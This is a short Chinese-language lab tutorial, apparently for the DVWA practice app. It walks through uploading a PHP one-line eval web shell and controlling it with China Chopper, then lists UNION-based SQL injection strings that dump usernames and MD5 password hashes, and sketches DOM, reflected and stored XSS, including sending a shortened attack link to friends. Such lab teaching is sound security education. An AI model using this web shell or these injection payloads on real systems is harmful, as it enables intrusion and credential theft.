信息安全之漏洞利用二
任务四:文件上传
1、建立一个PHP文件,内容为:<?php @eval($_POST['pass']);?>。
2、打开File Upload界面,将PHP一句话木马上传。
3、得到木马在服务器上的路径。如图
4、打开中国菜刀,把上传木马路径添加到工具上。
5、双击网址进入文件管理。(注:这里可以进行文件管理,数据库管理,虚拟终端或运行自写脚本)如图
任务五:
1、打开SQL Injection界面,该界面的功能是通过输入User ID查询Username。
2、输入1提交,将正常返回查询结果。
3、输入1’提交,将返回一个错误。
4、猜测使用的sql语句可能是:select First name and Surname from 表名 where id=‘输入的id’。
5、输入1’ union select 1,database()#提交,得到数据库名称。
6、输入1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#,得到数据库中的表名。
7、输入1’ union select 1,column_name from information_schema.columns where table_name=‘users’#,得到users表的列名。
8、输入1’ union select 1,concat(user,password) from users#,得到users表的所有用户名和密码。
我们可看出密码都是经过MD5加密过的,在线搜索MD5解密工具进行解密,以其中一个为例,如图
任务六:跨站攻击
1、打开XSS(DOM)界面,点击Select按钮,修改地址栏中的default属性为,回车后命令被执行。
2、打开XSS(Reflected)界面,点击Submit,修改地址栏中的name=。
3、利用在线短链接生成器伪造该链接,将短链接发送给小伙伴,命令被执行。
4、打开XSS(Stored)界面,在message栏中填入
,提交后内容被存入数据库,之后每次进入该页面命令都会被执行。
特别鸣谢:小明老师
